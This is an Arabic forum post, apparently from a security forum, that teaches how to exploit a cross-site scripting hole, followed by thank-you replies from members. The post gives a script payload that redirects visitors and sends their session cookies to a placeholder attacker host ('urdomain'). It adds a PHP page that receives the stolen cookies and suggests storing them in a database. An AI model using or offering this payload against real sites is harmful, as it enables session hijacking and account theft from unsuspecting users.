شرح استغلال ثغرة xss

السلام عليكم و رحمة الله و تعالى و بركاته
أهلا أعضاء و زوار منتديات الحماية للأبد

اليوم سأشرح لكم استغلال ثغرة xss
هذه الثغرة التي هي موجودة حتى يومنا هذا و هذا بسبب خطأ صغير

المهم انتو عارفين شكل الثغرة ان شاء الله و أنا فقط سأشرح
طريقة واحدة للاستغلال

يمكننا استغلا هاته الثغرة فقط في الصفحات التي تسمح لنا بكتلبة أكواد HTML

الحين نكتب استغلالنا بعدما اكتشفنا الثغرة



<script>window.location="http://urdomain/page.php?var="+document.cookie;</script>


نشرح الكود :

طلبنا من الجافا السكربت تحويل كل من دخل على الصفحة التي بها الثغرة الى صفحة في موقعنا مع اسناد قيمة الكوكيز في المتغير var

الآن نسنعرف محتوى صفحة page.php خاصتنا التي قمنا بتوجيههم اليها



echo $_GET['var'];


طبعا أنا هنا ماقمت سوي بطباعة محتوى المتغير

لكن أنتم يمكنكم أن تسوي العجب

كمثال تخزينها في قواعد البيانات و ما الى ذلك

الى هنا أصل الى نهاية الدرس و ان شاء الله تكونو استفتدتم و لو بقليل

و أعذروني على تقصيري

الشرح مهدي لجميع الأعضاء و خاصة نسيم و جاقو و مدير الموقع

دعواتكم لنا

يسعدني اول من يرد عليك ياغالي

يعطيك الف عافية شرح جميل

بنتضار جديدك

يسلمو يا غالي حقيقي css اسهل تغرة ولكن البعض يجهل طريقة استغلالها
:slight_smile:

[b]شرح جميل

بنتضار جديدك [/b]

منورين شباب بردودكم